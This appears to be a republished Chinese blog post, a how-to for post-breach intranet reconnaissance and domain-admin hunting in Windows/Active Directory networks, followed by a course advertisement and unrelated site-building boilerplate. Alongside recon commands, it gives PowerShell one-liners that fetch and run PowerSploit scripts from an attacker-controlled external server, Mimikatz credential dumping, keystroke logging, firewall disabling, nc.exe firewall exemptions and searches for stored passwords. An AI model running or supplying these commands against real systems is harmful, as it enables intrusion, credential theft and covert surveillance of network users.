iis 怎么绑定网站二级目录太仓网站制作网站建设
2026/4/9 2:19:01 网站建设 项目流程
iis 怎么绑定网站二级目录,太仓网站制作网站建设,wordpress下载管理插件下载,海报制作软件免费版收藏必备#xff01;内网渗透信息收集完全指南#xff1a;从机器角色判断到域管理员定位 本文全面介绍内网渗透测试中的信息收集技术#xff0c;包括判断机器所处网络区域及角色、本机信息收集#xff08;操作系统、权限、服务等#xff09;、域环境信息收集#xff08;…收藏必备内网渗透信息收集完全指南从机器角色判断到域管理员定位本文全面介绍内网渗透测试中的信息收集技术包括判断机器所处网络区域及角色、本机信息收集操作系统、权限、服务等、域环境信息收集判断域存在、解析域名等、存活主机扫描方法nbtscan、ping等、域管理员定位技术psloggedon、PowerView等以及使用BloodHound进行域分析。文章提供了大量实用命令和工具帮助渗透测试人员系统掌握内网环境信息收集技术为后续渗透奠定基础。介绍当我们通过渗透进入内网环境后面对的是一片未知区域。需要对当前机器角色判断对机器所处区域分析。判断当前机器区域判断机器所处于网络拓扑哪个区域是在DMZ区、办公区、核心区。区域界限是相对的机器角色判断文件服务器配合社工生成payload捆绑到文件服务器公用文件上可批量上线主机DNS服务器端口53可通过DNS服务器获取内网web系统信息或者探测域信息DHCP服务器查看内网多组网段信息更多的获取拓补信息开发测试服务器获取源码新的信息资产多存在弱口令代理服务器获取服务器账号拿到各种密码web服务器可能需要提权(一般接触到的环境)个人PC查看是否存在域环境本机信息收集包括操作系统、权限、内网IP段、杀软、端口、服务、补丁情况、网络连接、共享、会话等。如果是域内主机那么操作系统、应用软件、补丁、服务、杀软一般都是批量安装的。文件共享/FTP连接记录、浏览器访问记录、mstsc连接记录、ssh连接记录。如果由于使用了x86的shell无法使用命令需要在命令前加上c:\windows\sysnative这样就能执行x64的命令了。查询网络配置信息。进行IP地址段、端口、arp记录内网段信息收集ipconfig /all netstat -ano arp -a查看当前系统版本wmic OS get Caption,CSDVersion,OSArchitecture,Version查看体系结构echo %PROCESSOR_ARCHITECTURE%查询操作系统及软件信息systeminfo | findstr /B /C:”OS Name” /C:”OS Version” ## 英文系统 systeminfo | findstr /B /C:”OS 名称” /C:”OS 版本” ## 中文系统查看.net framework版本reg query “HKLM\Software\Microsoft\NET Framework Setup\NDP” /s /v version | findstr /i version | sort /26 /r查看补丁列表systeminfo查看补丁的名称、描述、ID、安装时间等wmic qfe get Caption,Description,HotFixID,InstalledOnPowerShell收集软件的版本信息powershell “Get-WmiObject -class Win32_Product |Select-Object -Property name, version”查看安装的软件的版本、路径等wmic product get name, version查看软件比较靠谱的做法是将远程加载本地ps文件cs中可以使用powershell-import,上传ListInstallProgram.ps1后输入powershell Get-list将文件放到靶机本地加载也可以shell powershell -exec bypass -Command {Import-Module C:\Users\HackerQWQ\Desktop\ListInstalledProgram.ps1;Get-list}查看当前用户权限whoami whoami /priv查询本机服务信息wmic service list brief查看开启的服务net startwmic查询进程信息wmic process list brief查看进程tasklist /svc查看启动程序信息wmic startup get command,caption查看计划任务(需要高权限)atwin10之前 schtasks /query /fo LIST /vwin10之后查看主机开机时间net statistics workstation查看本机用户列表net user获取本地管理员信息net localgroup administrators查看当前在线用户query user || qwinsta查看在线用户quser列出或断开本地计算机与所连接的客户端的对话(需要高权限)net session查询端口列表Windows: netstat -ano linux: netstat -tnlp查看本机共享列表和可访问的域共享列表net share 445端口查找共享列表wmic share get name,path,status磁盘映射net use k: \192.168.1.10\c$查询路由表route print可用接口的ARP缓存表。局域网内arp -a查看是否有重复的mac地址判断是否存在arp欺骗。服务器绑定mac地址方式防止arp欺骗arp -a查看远程连接信息cmdkey /l查看杀软WMIC /Node:localhost /Namespace:\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List查看本地密码策略net accounts查看hosts文件linux:cat /etc/hosts windows:type c:\Windows\system32\drivers\etc\hosts查看dns缓存ipconfig /displaydns列举安装的软件ListInstalledProgram项目地址:https://github.com/3gstudent/ListInstalledPrograms自动信息收集我们可使用自动化脚本WMICWindows Management Instrumentation Command-LineWindows管理工具命令行。在默认情况下任何版本的Windows XP的低权限用户不能访问WMICWindows 7以上版本的低权限用户允许访问WMIC并执行相关操作。 执行后会将信息收集的结果写入HTML文档。项目地址 http://www.fuzzysecurity.com/scripts/files/wmic_info.rar获取主机信息也可以用Seatbelt.exe项目地址https://github.com/GhostPack/Seatbelt/tree/master需要编译,放到靶机上执行下列命令shell Seatbelt.exe -groupall env.txt最好先免杀一下不然360会一直警告,cs上的插件也有集成Seatbelt可以直接使用插件常见查毒软件进程tasklist /svc随后将结果放到avList中对比查看进程软件名称360SD.EXE360杀毒360TRAY.EXE360实时保护ZHUDONGFANGYU.EXE360主动防御KSAFETRAY.EXE金山卫士SAFEDOGUPDATECENTER.EXE服务器安全狗MCAFEE MCSHIELD.EXE迈克菲杀毒软件EGUI.EXENOD32AVP.EXE卡巴斯基AVGUARD.EXE小红伞BDAGENT.EXEBITDEFENDER可以用avList自动判断,项目地址:https://github.com/gh0stkey/avList浏览器信息收集项目地址https://github.com/moonD4rk/HackBrowserDataimage-20220731162608183域环境信息收集判断是否存在域ipconfig /all可查看网关IP地址、DNS的IP地址、域名、本机是否和DNS服务器处在同一网段等。image-20211220011528899解析域名ip通过反向解析查询命令nslookup来解析域名的IP地址用解析到的IP地址进行对比判断域控服务器和DNS服务器是否在同一台机器上image-20211220011610591查看当前权限whoami获取域SIDwhoami /all查询指定用户的详情信息net user xxx /domain查看域内所有账号net user /domain对比查看”域(域名)”和”登录服务器(域控制器)”的信息是否匹配systeminfo对比查看”工作站域DNS名称(域名)”和”登录域(域控制器)”的信息是否相匹配net config workstation查看时间可以找到域控net time /domain查看域密码策略net accounts /domain查看当前登录域net config workstation查看域用户net user /domain登录本机的域管理员net localgroup administrators /domain获取域控ipping -a xxx.com查询域net view /domain查询域内的所有计算机net view /domain:HACHE查询域的所有组enterprise admins组权限最大net group /domainSPN扫描setspn -T domain -q/查看域管理员的用户组net group “domain admins” /domain查询域系统管理员用户组net group “Enterprise admins” /domain查看域控制器net group “domain controllers” /domain查看域控制器的机器名nltest /DCLIST:hacke查看dns缓存ipconfig /displaydns列域控c盘文件(需要域管理员权限)dir \WIN-75NA0949GFB.safe-duck.com\c$查询所有域成员计算机列表net group “domain computers” /domain获取域信任信息nltest /domain_trusts获取域内用户的详细信息wmic useraccount get /all查看存在的用户dsquery user查询所有计算机名称dsquery computer攻击主机CMD扫描同网段存活ipwindows# 扫c段 for /L %P in (1,1,254) DO ping ‐w 1 ‐n 1 192.168.1.%P | findstr TTL Linux#!/bin/bash NET10.168.1. for IP in {100..115} do if ping -c2 -i0.2 -w2 $NET$IP /dev/null then echo -e $NET$IP is \033[31mup\033[0m else echo -e $NET$IP is \033[32mdown\033[0m fi done扫b段for i in 192.168.{1..254}.{1..254}; do if ping -c 3 -w 3 $i /dev/null;then echo $i is alived; fi; donePowerView.ps域内信息收集Invoke-NetView //查域内环境 Invoke-ShareFinder //查共享目录 Invoke-MapDomainTrusts //查看域内信任关系 Get-NetLocalGroup -HostName TARGET(主机名) //查看指定用户的登录时间、所属组情况cs信息收集target组信息的命令net group \Target net localgroup \target 组名获取远程目录shell dir \target\c\users //递归获取多级目录及文件cs通过powershell命令获取目录信息powersehll Invoke-Command -ComputerName target -ScriptBlock{dir c:} powershell Invoke-Command -ComputerName target -ScriptBlock{net localgroup administrators}cs通过mimikatz抓取远程哈希值powershell-import Invoke-Mimikatz.ps1 powershell Invoke-Mimikatz -DumpCreds powershell Invoke-Mimikatz -Command ‘“privilege::debug” “sekurlsa::logonPasswords full”‘防火墙相关关闭防火墙Windows Server 2003及之前的版本(admin)netsh firewall set opmode disableWindows Server 2003之后的版本(admin)netsh advfirewall set allprofiles state off查看防火墙配置netsh firewall show config20210402114218修改防火墙配置Windows Server 2003及之前的版本允许指定程序全部连接netsh firewall add allowedprogram c:\nc.exe allow nc enableWindows Server 2003之后的版本情况如下。允许指定程序进入netsh advfirewall firewall add rule namepass nc dirin actionallow programC:\nc.exe允许指定程序退出netsh advfirewall firewall add rule nameAllow nc dirout actionallow programC:\nc.exe允许3389端口放行netsh advfirewall firewall add rule nameRemote Desktop protocolTCP dirin localport3389 actionallow自定义防火墙日志的储存位置netsh advfirewall set currentprofile logging filename C:\windows\temp\fw.log查询代理配置情况reg query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings20210402114228查询并开启远程连接服务查看远程连接端口0xd3d转换后就是3389REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp /V PortNumber在Windows Server 2003中开启3389端口wmic path win32_terminalservicesetting where (__CLASS !) call setallowtsconnections 1在Windows Server 2008和Windows Server 2012中开启3389端口wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS !) call setallowtsconnections 1 wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalNameRDP-Tcp) call setuserauthenticationrequired 1 reg add HKLM\SYSTEM\CURRENT\CONTROLSET\CONTROL\TERMINAL SERVER /v fSingleSessionPerUser /t REG_DWORD /d 0 /f端口扫描telnet端口连接没有开启的话去“打开或关闭windows功能”开启telnet只用于确认端口是否开启用不拿来端口扫描telnet 主机 端口 telnet 192.168.52.138 445PowerSploit 中的Invoke-portscan.ps1脚本下载地址https://github.com/PowerShellMafia/PowerSploit端口扫描利用到工具包中的Portscan.ps1powershell -nop -exec bypass -c IEX(New-Object Net.WebClient).DownloadString(http://39.xxx.xxx.210/powersploit/Recon/Invoke-Portscan.ps1);Invoke-Portscan -Hosts 192.168.1.1/24 -T 4 -ports 445,1433,8080,80,3389 // 或者扫描全部的端口-Ports 1-65535image-20211229003834739Nishang中的Invoke-portscan.ps1下载地址https://github.com/samratashok/nishang该脚本可用于发现主机、解析主机名、扫描端口。powershell -nop -exec bypass -c IEX(New-Object Net.WebClient).DownloadString(http://39.xxx.xxx.210/nishang/Scan/Invoke-PortScan.ps1);Invoke-PortScan -StartAddress 192.168.1.1 -EndAddress 192.168.1.255 -ResolveHost -Port 1-65535 // -ResolveHost解析主机名image-20211229004647052Nmap扫描一般通过挂代理nmap远程扫描《内网渗透测试隐藏通讯隧道技术》Metasploit 端口扫描模块Metasploit中提供了很多内置的扫描模块使用方便在侵入内网后设置好路由直接扫即可有时速度有些慢。几个常用的auxiliary/scanner/portscan/tcp auxiliary/scanner/portscan/tcp auxiliary/scanner/portscan/ack收集域内端口的banner信息banner信息表示“欢迎语”其中会包含一些敏感信息在banner信息中可以获取到软件开发商、软件名称、服务类型、版本号等而版本号信息有时会存在公开的CVE可以利用。获取到版本号后可以在中查找到对应的CVE编号并在ExploitDB等平台上面找到相关的利用方式。使用Nmap获取bannernmap IP地址 --scriptbanner -p 端口/端口范围img使用nc获取bannernc -nv IP地址 端口img存活主机扫描nbtscannbtscan.exe是一个命令行工具用于扫描本地或远程TCP/IP网络上的开放NetBIOS名称服务器。下载地址https://github.com/MrAnonymous-1/nbtscan将nbtscan.exe上传到目标主机上然后直接输入ip段即可运行扫描//扫描一个网段 nbtscan.exe 192.168.1.0/24 //扫描两个网段 nbtscan.exe 192.168.1.0/24 192.168.2.0/24image-20220102212911598参数解释SHARING该主机存在正在运行的文件和打印共享服务DC该机器可能是域控制器?没有识别处该机器的NetBIOS资源ping基于icmp扫描内网for /L %I in (1,1,254) DO ping -w 1 -n 1 192.168.52.%I | findstr TTL //兼容win7 for /l %i in (1,1,254) do ping -a 10.0.1.%i -w 1 -n 1 | find /i Ping //扫b段 for /l %i in (1,1,254) do ping -a 10.0.%i.1 -w 1 -n 1 | find /i Pingimage-20220102210052830arp-scan.exe基于arp协议来进行存活性扫描项目地址https://github.com/QbsuranAlang/arp-scan-windows-image-20220102223533890批处理脚本这个批处理文件可用于对内网工作组和域内存活主机进行简单的扫描探测并且支持中英文操作系统。echo off echo. FOR /F usebackq delims, %%J IN (net view /domain ^|find 命令成功完成 /v ^|find The command completed successfully. /v ^|find 命令成功完成 /v ^|find -- /v ^|find Domain /v ^|find /v ^|find コマンドは正常に終了しました /v /i) do ( echo Domain:%%J FOR /F usebackq eol; delims, %%i in (net view /domain:%%J ^|findstr \\) do ( FOR /F usebackq eol; tokens1,2,3* delims\\ %%a in (echo %%i) do ( ping %%a -4 -n 1 -w 100 |find /i ping %%a.txt FOR /F tokens2 delims[] %%b in (%%a.txt) do echo \\%%a [%%b] del /f /q %%a.txt ))) echo Getting IP Complete msf主机存活扫描auxiliary/scanner/discovery/udp_sweep auxiliary/scanner/discovery/udp_probe auxiliary/scanner/netbios/nbnameMSF建立会话拿到shell即可直接执行DOS命令至今进行信息收集。也可以进行直接执行run winenum可以一键收集记录。run winenum定位域管理员psloggeddon.exe下载地址https://docs.microsoft.com/en-us/sysinternals/downloads/psloggedonpsloggedon.exe可以查看本地登陆的用户和通过本地计算机或远程计算机资源登陆的用户。如果指定的是用户名而不是机器名psloggedon.exe会搜索网上邻居中的所有计算机并显示该用户是否已经登录。该工具的某些功能需要管理员权限。psloggedon.exe [-] [-l] [-x] [\\computername或username]查看DC(域控)登录过的机器PsLoggedon64.exe -accepteula \\DCimage-20220102224228793查看本地登录的用户PsLoggedon64.exe -accepteulaimage-20220102224301966查看指定用户登录的计算机PsLoggedon64.exe -accepteula Administratorimage-20220102224406477PVEFindADUser.exe下载地址https://www.corelan.be/index.php/my-free-tools/ad-cs/pve-find-ad-user/PVEFindADUser.exe 可用于查找活动目录用户登陆的位置、枚举域用户以及查找在特定计算机上登陆的用户包括查找本地用户。通过RDP远程桌面登陆的用户、通过运行服务和计划任务的用户。运行该工具需要计算机配置**.NET Framework 2.0 环境**并需要有**管理员权限**。PVEFindADUser.exe 参数我们一般直接运行pvefinaduser.exe -current命令即可显示域中所有计算机上当前登陆的所有用户。image-20220102225301609显示指定用户登录的计算机current[“username”]如果仅指定了-current参数将获取目标计算机上当前登录的所有用户。如果指定了用户名(Domain\Username)则显示该用户登陆的计算机PVEFindADUser.exe -current redteam.org\dc //PVEFindADUser.exe -current domain\usernameimage-20220102225446676powerview.ps1powerview脚本可以用来获取当前域管理员在线登录的服务器其依赖powershell和wmi在powersploit工具包中是一个收集域信息很好用的脚本。Invoke-UserHunter**搜索本地域中域管理员当前在线的主机并验证当前用户是否具有对这些主机的本地管理员访问权限。**它可以使用 Get-NetSessions 和Get-NetLoggedon 扫描每台服务器并对扫描结果进行比较从而找出目标用户集并且无需管理员权限。如下可以看到本地域有一个域管理员我们通过Invoke-UserHunter等于Invoke-UserHunter -CheckAccess)来定位他们powershell.exe -exec bypass IEX(New-Object Net.WebClient).DownloadString(http://39.xxx.xxx.210/powersploit/Recon/PowerView.ps1);Invoke-UserHunter详情请执行Get-Help Invoke-UserHunter命令查看具体使用方法与前两个相似它可以找到域内特定的用户群接受用户名、用户列表和域组列表查询接受一个主机列表或查询可用的主机域名。一切都是灵活的让你自己定义找寻谁在哪里找。获取指定用户在线机器imgEmpire信息收集# 查看本机用户、域组成员、密码设置时间、剪贴板内容、系统基本信息、网络适配器信息、共享信息等 usemodule situation_awareness/host/winenum # 目标主机事件日志、应用程序控制策略日志、RDP登录信息、PowerShell脚本运行和保存的信息等需要管理员权限 usemodule situational_awareness/host/computerdetailspowersploit 信息收集项目地址https://github.com/PowerShellMafia/PowerSploit 已经停止维护建立会话后的meterpreter#加载模块 load powershell #调用本地ps脚本 powershell_import /usr/share/windows-resources/powersploit/Recon/xx.ps1 #命令执行 powershell_execute Get-NetDomain #获取当前的域名称 Get-NetDomain #返回所有域内成员的详细信息 Get-Netuser #获取所有的域内的控制器信息 Get-NetDomainController #获取所有域内机器的名称 Get-NetComputer #获取域内的所有的网络共享 Get-Netshare #获取指定服务的远程连接信息 Get-NetRDPSESSION #获取进程的详细信息 Get-NetProcess # 获取活动目录的信息 Get-ADOPJECT #判断用户是否登陆计算机且用户是否有管理员权限 invoke-processhunterpowersploit无文件攻击 将下载的文件放在vps上面。确保目标服务器可以访问如http://xxx.com/PowerSplot/Recon/Invoke-Portscan.ps1#在目标机导入脚本 iex(new-object net.webclient).downloadstring(http://192.168.1.4/PowerSploit/Recon/Invoke-Portscan.ps1) #扫描网段、端口 invoke-portscan -hosts 192.168.1.1/24 -ports 21,22,80,139,80,445 #invoke-mimikatz抓取hash iex(new-object net.webclient).downloadstring(http://192.168.1.4/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1) #导hash Invoke-Mimikatz -dumpcreds #get-keystrokes键盘记录 iex(new-object net.webclient).downloadstring(http://192.168.1.4/PowerSploit/Exfiltration/Get-Keystrokes.ps1) #将键盘记录保存到123.txt里面 Get-Keystrokes -logpath C:\Users\admin\123.txt翻翻配置文件一个正常的Web应用肯定有对应的数据库账号密码信息可以使用如下命令寻找包含密码字段的文件findstr /s /m password *.* findstr /s /i /m /r defineclass remoteserver Web目录 \*.jsp # /r 表示正则/s表示遍历子目录/m表示不显示匹配Linux查文件find Web应用目录 -iname *.jsp* | xargs egrep -l -i classloader |xargs egrep -l -i cipher find Web应用目录 -iname *.php* | xargs egrep -l -i openssl_decrypt |xargs egrep -l -i file_get_contents敏感路径%WINDIR% %WINDIR%\system32\ %TEMP% %LOCALAPPDATA% %APPDATA% C:\TEMP\ C:\Windows\Temp %UserProfile%\Downloads %UserProfile%\Recent C:\$Recycle.bin常用应用的默认配置路径Tomcat: CATALINA_HOME/conf/tomcat-users.xml Apache: /etc/httpd/conf/httpd.conf Nginx: /etc/nginx/nginx.conf Wdcp: /www/wdlinux/wdcp/conf/mrpw.conf Mysql: mysql\data\mysql\user.MYD还有一些Navicat,TeamViewer,FileZilla,WinSCP,Xmangager系列产品Xshell,Xftp)的密码查看项目: https://github.com/uknowsec/SharpDecryptPwdBloodHound域分析工具BloodHound通过图与线的形式将域内用户、计算机、及相关用户等等之间的关系直观地展现在Red Team队员面前帮助更快的梳理域内的情况。BloodHound基于Neo4j(非关系型数据库)配置安装java安装Neo4jServer Communityhttps://neo4j.com/download-center/#communityimage-20220107001050290开启服务neo4j.bat consoleimage-20220107001246254通过http://localhost:7474/broswer访问账号密码neo4j/neo4jimage-20220107001346092忘记密码的话将neo4j.conf中的dbms.security.auth_enabledfalse开启就可以了重启服务即可生效下载BloodHound打开BloodHound.exe输入账号密码(neo4j/123456)即可进入主页面image-20220126163803646使用通过上传SharpHound.exe运行命令SharpHound.exe -c all生成压缩包然后在BloodHound.exe的upload data导入数据image-20220126181806426可以选中一个节点查看node infoimage-20220126181902426也可以通过analysis中的一些预定义查询语句查询,如这里选用Find all Domain Admins查询结果文章来自网上侵权请联系博主互动话题如果你想学习更多网安方面的知识和工具可以看看以下## 学习资源如果你是也准备转行学习网络安全黑客或者正在学习这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你知识库由360智榜样学习中心独家打造出品旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力熟练掌握基础攻防到深度对抗。1、知识库价值深度 本知识库超越常规工具手册深入剖析攻击技术的底层原理与高级防御策略并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等提供了独到的技术视角和实战验证过的对抗方案。广度 面向企业安全建设的核心场景渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点是应对复杂攻防挑战的实用指南。实战性 知识库内容源于真实攻防对抗和大型演练实践通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。2、 部分核心内容展示360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。内容组织紧密结合攻防场景辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合是你学习过程中好帮手。1、网络安全意识2、Linux操作系统3、WEB架构基础与HTTP协议4、Web渗透测试5、渗透测试案例分享6、渗透测试实战技巧7、攻防对战实战8、CTF之MISC实战讲解3、适合学习的人群‌一、基础适配人群‌‌零基础转型者‌适合计算机零基础但愿意系统学习的人群资料覆盖从网络协议、操作系统到渗透测试的完整知识链‌‌开发/运维人员‌具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能实现职业方向拓展‌或者转行就业‌应届毕业生‌计算机相关专业学生可通过资料构建完整的网络安全知识体系缩短企业用人适应期‌‌二、能力提升适配‌1、‌技术爱好者‌适合对攻防技术有强烈兴趣希望掌握漏洞挖掘、渗透测试等实战技能的学习者‌2、安全从业者‌帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力‌3、‌合规需求者‌包含等保规范、安全策略制定等内容适合需要应对合规审计的企业人员‌因篇幅有限仅展示部分资料完整版的网络安全学习资料已经上传CSDN朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】这些东西我都可以免费分享给大家需要的可以点这里自取:网安入门到进阶资源

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询